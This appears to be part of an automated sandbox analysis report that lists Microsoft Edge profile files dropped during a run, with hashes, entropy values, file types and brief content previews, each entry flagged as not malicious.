                                                                                                                                                                                                                                                                  SHA1:2194ED5E2E8B8AE58513C432F14E266477E5A24C
                                                                                                                                                                                                                                                                  SHA-256:AA4DB7D584F783F381EB25F2C684517CB8162DCB7B19E00C29C5D5DDD920156E
                                                                                                                                                                                                                                                                  SHA-512:BF87614F2AF267ADE02ED7D308936FB6E09D2CF5DFA680EED23C7064C213DFE67142C5224BFB1A272864068830A4AC6B82573AEEE129B099E6D18A4AC5A11143
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.449 2274 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-07:44:23.451 2274 Recovering log #3.2024/12/19-07:44:23.456 2274 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                                  Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                  MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                  SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                  SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                  SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                  Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                  MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                  SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                  SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                  SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):635202
                                                                                                                                                                                                                                                                  Entropy (8bit):6.015641405985325
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:dmaP2W8JQiCtQ9/IQW8bvw7kFz8PbIfKGnzPjPMK56nQuda:d158g6DikFwPbW3MKwk
                                                                                                                                                                                                                                                                  MD5:3E60FDAC028F69F488D6EF5351BED25C
                                                                                                                                                                                                                                                                  SHA1:470E51D9455EBD53E982A9BBD87139A1960A0211
                                                                                                                                                                                                                                                                  SHA-256:AA2CD346CEC310F39A942459E1EF0974033D7107CC937B25F08BCC721E502575
                                                                                                                                                                                                                                                                  SHA-512:F1C57BB5F40721752079019DA68F71E142CFFF0A8BEB846CA24FED61FACFBCB6B3C7132A2AECBDACFEC4526B89EBFA0DE2B17FF13A208804FAF1E12D92811D79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1..l..................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3759820,"primeBases":[5381,5381,5381,5381],"supportedDomains":"GFf64FMwbTXONwpTKw8NswCMcDsTVutudxdC2VBNvqhRP5f8uIpOCpOEQF8P1FwhE/L5zzVDFUhlVkAyNg+QuR5AdfrHMaGmUYmGNsEWYR3+DcNBpZ/I5Kibhl4YVjThBkPcIOC9odU2mFrQP1mAq7X/iiSahqI2Dpcr7UQx3fiFGc+G7XS3ADWuanE3R+gk9baykePz1ufouCz2G6MEEPn8bWcpcyUh9W8HVj78wJDg545r3xfqy9Eyybv1AY7wk5NysoFumawShyBUcAfG+SahV7VCYKy5zIPNyoCeHT7RoaXGBpNlEkGeEz1pYIKUGda3nlWrAEwSDzlhgehpJ/X1Rp9tYqpwf38kC6BMCxZCRL4z6g5SdaGqv5ivcLrieLvK2t+5NxWiDNhU+IvXTnVlWeGTn2T95gH+7lnN+XRyxA1bm2H2t7/ZXMQPghA+jmq1JXjNEEY7ZygGMT6g8AJP+eKF+uMA9nLdAKgqMWaAEIEHpe6cVu9h33kKHDUc4YBhOqRQmDMW5E6AMOPT/pEyBLKjkj1WvRlUFemwOegxLnKlu8WdpyNChIXAZh5ssx4XScADAB8JF4uenIqZ/8VqvDWcj/EO28Kg/hdaq5AdTOkxN5+g+VcYlQjtUvp9wec76PnYAi073dVfe0LdOoZtneuxu0WHqemOudoq5KjhkrnMV21rCBsiksEM6oueFQz7/UD9LKDYqAE7eN5pdP6Isz+ByLpm5GWLTZxK5E1r3UAC/bHUgnXDo22YLMiIEVmkLwXS2Vxykqczr6CUDolW/WRvObO/vpH

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):142
                                                                                                                                                                                                                                                                  Entropy (8bit):5.07322717258518
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:A/38E28xp4m3rscUSW1yMVaEmialf+nETPxpK2x7L8KFFb5FBFUt+Fxn:A38D8xSEsITWVO+n0PxEWHFpbBut+Fxn
                                                                                                                                                                                                                                                                  MD5:2F8187F4D409BA95DEFAD67EEE42FFEB
                                                                                                                                                                                                                                                                  SHA1:C49FA507CFBB2E640CAD146D26D97C421F96BDDB
                                                                                                                                                                                                                                                                  SHA-256:D3323090CBCE9DF93825BEDB43BEF234E6B4938947CD810087C7FD386B1FB28F
                                                                                                                                                                                                                                                                  SHA-512:5C671FA7EA4AB182D5180BC6B9294F0072058B33C485043F4AAAB58DCDA2C2979E2D5F32831D010EB3FA84ACA071AA7B10A2326932A43D9D48F92CDB1861B348
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.T.y9................BLOOM_FILTER_EXPIRY_TIME:.1734698675.881038....G................BLOOM_FILTER_LAST_MODIFIED:.Thu, 19 Dec 2024 12:02:45 GMT

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):635183
                                                                                                                                                                                                                                                                  Entropy (8bit):6.0150488963174
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:9maY2WDJQKCtP9/IQf8bvwrkHtePbPcKGncPjRQK5VnMNdo:91JPg7DgkHsPbSkQKK2
                                                                                                                                                                                                                                                                  MD5:1BDC22829D6B48F827D4A497D9211035
                                                                                                                                                                                                                                                                  SHA1:291802612BE131696D0CF8294F402AC4C357A377
                                                                                                                                                                                                                                                                  SHA-256:99D1BFA88799B53E1AD9EF6ABB1CF9985E8EA687632A63871844C65128CE6750
                                                                                                                                                                                                                                                                  SHA-512:81B9043179E4B02D3CCEAADB39002261396A3F21E8D509B4C619CE4D263DAB298DB52B7419BB1E94338232AA2EE1D16C6E91EE62791A66B5068692D82C5D6546
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3759820,"primeBases":[5381,5381,5381,5381],"supportedDomains":"GFf64FMwbTXONwpTKw8NswCMcDsTVutudxdC2VBNvqhRP5f8uIpOCpOEQF8P1FwhE/L5zzVDFUhlVkAyNg+QuR5AdfrHMaGmUYmGNsEWYR3+DcNBpZ/I5Kibhl4YVjThBkPcIOC9odU2mFrQP1mAq7X/iiSahqI2Dpcr7UQx3fiFGc+G7XS3ADWuanE3R+gk9baykePz1ufouCz2G6MEEPn8bWcpcyUh9W8HVj78wJDg545r3xfqy9Eyybv1AY7wk5NysoFumawShyBUcAfG+SahV7VCYKy5zIPNyoCeHT7RoaXGBpNlEkGeEz1pYIKUGda3nlWrAEwSDzlhgehpJ/X1Rp9tYqpwf38kC6BMCxZCRL4z6g5SdaGqv5ivcLrieLvK2t+5NxWiDNhU+IvXTnVlWeGTn2T95gH+7lnN+XRyxA1bm2H2t7/ZXMQPghA+jmq1JXjNEEY7ZygGMT6g8AJP+eKF+uMA9nLdAKgqMWaAEIEHpe6cVu9h33kKHDUc4YBhOqRQmDMW5E6AMOPT/pEyBLKjkj1WvRlUFemwOegxLnKlu8WdpyNChIXAZh5ssx4XScADAB8JF4uenIqZ/8VqvDWcj/EO28Kg/hdaq5AdTOkxN5+g+VcYlQjtUvp9wec76PnYAi073dVfe0LdOoZtneuxu0WHqemOudoq5KjhkrnMV21rCBsiksEM6oueFQz7/UD9LKDYqAE7eN5pdP6Isz+ByLpm5GWLTZxK5E1r3UAC/bHUgnXDo22YLMiIEVmkLwXS2Vxykqczr6CUDolW/WRvObO/vpHqRCZMFqXmSG6Abc4z8bIucyyzoYTXsuB6aaXR1pNRBl9

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                  Entropy (8bit):5.256925704358372
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7GjL+v4Yebn9GFUt8OV/+OYlLV5LYebn95Z9pFWf0TkWfd+KOxNh:7GM4Yeb9ig8O5OLYeb9zLVTwjh
                                                                                                                                                                                                                                                                  MD5:05A6E1D9D96607AAE1DBDFA4C009E0A7
                                                                                                                                                                                                                                                                  SHA1:DBC53C6FACDFFD040ADF724F04D64CFAC9A38D66
                                                                                                                                                                                                                                                                  SHA-256:9263B78C994E327300C5D89E836492B4E8DF9EDFB86BD982264017AB1C7BA1AC
                                                                                                                                                                                                                                                                  SHA-512:4E2755B5C29A9A3BBFCE56FEFC80785B8CDC2EE84BB053763E52740C13EF43DFADCF462B2C78B93ED5F7AC202495A149293EC0A6B133CAF3B4F34DEE6E9A84E3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.452 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-07:44:19.453 1d1c Recovering log #3.2024/12/19-07:44:19.454 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/19-07:44:35.955 1d18 Level-0 table #5: started.2024/12/19-07:44:35.994 1d18 Level-0 table #5: 635183 bytes OK.2024/12/19-07:44:35.995 1d18 Delete type=0 #3.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                  Entropy (8bit):5.256925704358372
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7GjL+v4Yebn9GFUt8OV/+OYlLV5LYebn95Z9pFWf0TkWfd+KOxNh:7GM4Yeb9ig8O5OLYeb9zLVTwjh
                                                                                                                                                                                                                                                                  MD5:05A6E1D9D96607AAE1DBDFA4C009E0A7
                                                                                                                                                                                                                                                                  SHA1:DBC53C6FACDFFD040ADF724F04D64CFAC9A38D66
                                                                                                                                                                                                                                                                  SHA-256:9263B78C994E327300C5D89E836492B4E8DF9EDFB86BD982264017AB1C7BA1AC
                                                                                                                                                                                                                                                                  SHA-512:4E2755B5C29A9A3BBFCE56FEFC80785B8CDC2EE84BB053763E52740C13EF43DFADCF462B2C78B93ED5F7AC202495A149293EC0A6B133CAF3B4F34DEE6E9A84E3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.452 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-07:44:19.453 1d1c Recovering log #3.2024/12/19-07:44:19.454 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/19-07:44:35.955 1d18 Level-0 table #5: started.2024/12/19-07:44:35.994 1d18 Level-0 table #5: 635183 bytes OK.2024/12/19-07:44:35.995 1d18 Delete type=0 #3.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):103
                                                                                                                                                                                                                                                                  Entropy (8bit):5.287315490441997
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVj2Thin/GpR8xFxN3erkEtl:scoBY7j2Q/+KxFDkHl
                                                                                                                                                                                                                                                                  MD5:B987581B38C2439D148DE0B235DA8457
                                                                                                                                                                                                                                                                  SHA1:72F284B50FC9F8F7055DD32F746D311D9DB3D5D5
                                                                                                                                                                                                                                                                  SHA-256:8E8CCF597EB794A3832FA9094F758D2AFC34CF9333B5776A1507CC2D5694AF52
                                                                                                                                                                                                                                                                  SHA-512:7E741B1E97D08918274192AAF0DDF94809D2ABE94E511F47FB863D8E806D62A8FABD07A98F64E9B925A474D79FC06F887E0171C6A3AD61693475A849E3F914E4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator.......u..7...............&.BLOOM_FILTER:.........DB_VERSION........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6132786489122417
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWdMAqaiZ7dV:TLapR+DDNzWjJ0npnyXKUO8+jwpXmL
                                                                                                                                                                                                                                                                  MD5:4D7BBB07E775E9E19A80670E39963554
                                                                                                                                                                                                                                                                  SHA1:9C0B38D553427E451BEB629FEFF4D5D6526B0BA3
                                                                                                                                                                                                                                                                  SHA-256:6FE6A9EFD63C471353DFE9CA9FA271EF9821310E281F9B6B63AFD0A3DBE0773C
                                                                                                                                                                                                                                                                  SHA-512:B7B43F5514FF30AE77E77766451C9CE2EA547D6E1A8F3A6B852D48317B78C43A6DEC7D5C9CAA1B6EB5C94F9CEE6A4341A899A62C916315E3E4D0AA5EBBE3EFEE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                  Entropy (8bit):5.354123006580732
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:dA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:dFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                  MD5:6A57A384F4E6C23039A9B461A6867D66
                                                                                                                                                                                                                                                                  SHA1:0CD60283CBCDFA284FBC60866701D4A250FD1969
                                                                                                                                                                                                                                                                  SHA-256:7B2BCB06CE60D0F59EF7D144BEEEF8E84F085B97E7379E6AEC03E681B96174F9
                                                                                                                                                                                                                                                                  SHA-512:2AEE42A3B90008268DA0E13FD50A217EEE4ECAF23BEF07F3774A492FF0DB38D379987CF3FB68E4BA713B254DFA017B263E9E075AD1B853D0F8B97B2AD77B08AA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.[.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379085867468624..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):311
                                                                                                                                                                                                                                                                  Entropy (8bit):5.159033201941062
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPYXR1923oH+Tcwtk2WwnvB2KLlpoP2+q2P923oH+Tcwtk2WwnvIFUv:7LX8YebkxwnvFLTh+v4YebkxwnQFUv
                                                                                                                                                                                                                                                                  MD5:82A7CC851D4FA71C52DAFEF462FCE2F9
                                                                                                                                                                                                                                                                  SHA1:C05085C56761CBF47C4861F72D8C83815F0EA88F
                                                                                                                                                                                                                                                                  SHA-256:98B3154EAF9879EFBF19F58AD3A3C1A332D4274363FD8EBD3F9EA597C8B9387F
                                                                                                                                                                                                                                                                  SHA-512:D6F8A025F70CCC0FEFB3444C2FAB2C34CC0557F8E24F93CE2067F21F7A832BAA8A69F637EF4AFC32969F2061CECAF39982EDD7322D79D0F4E2E3741CC81FD569
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.869 229c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/19-07:44:25.022 229c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                  Download File
